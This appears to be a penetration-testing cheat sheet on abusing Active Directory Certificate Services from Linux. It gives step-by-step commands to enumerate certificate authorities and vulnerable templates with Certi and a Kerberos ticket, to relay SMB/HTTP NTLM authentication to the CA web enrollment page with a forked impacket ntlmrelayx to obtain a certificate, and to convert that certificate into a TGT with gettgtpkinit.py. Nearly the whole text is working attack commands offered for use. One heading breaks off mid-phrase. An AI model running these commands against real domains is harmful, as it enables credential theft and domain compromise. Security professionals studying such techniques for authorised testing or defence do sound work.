PKI Abuse

Enumerating ADCS On Linux

Download and install Certi

git clone https://github.com/eloypgz/certi
cd certi
python3 setup.py install

Certi only support kerberos auth, so to perform authenticated enumeration, you need to fetch a TGT for a valid user first.

getTGT.py '<domain>/<username>:<password>' <username>.ccache

Set the env var to the output ccache

export KRB5CCNAME=<username>.ccache

Enumerate Certificate Autherties on the domain (CA's)

python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --class ca

Enumerate vuln templates

python3 certi.py list '<domain>/<username>' -k -n --dc-ip <dc-ip> --vuln --enable

Relaying incoming SMB/HTTP connection to ADCS to generate a certificate on

Fetch and install a custom fork of impacket

git clone https://github.com/ExAndroidDev/impacket.git
cd impacket
git checkout ntlmrelayx-adcs-attack

Create a virtual python env to contain this version of impacket (Avoid breaking the release you already have installed)

apt install python3-venv
python3 -m venv adcs-impacket

Move "into" this virutal env

source adcs-impacket/bin/activate

Still inside the impacket folder

pip3 install .

You can now setup ntlmrelay for realying

python3 examples/ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs --template <template-name>

python3 gettgtpkinit.py <domain>/<username> -pfx-base64 $(cat <base64-cert.file>) -dc-ip <dc-ip> out_tgt.ccache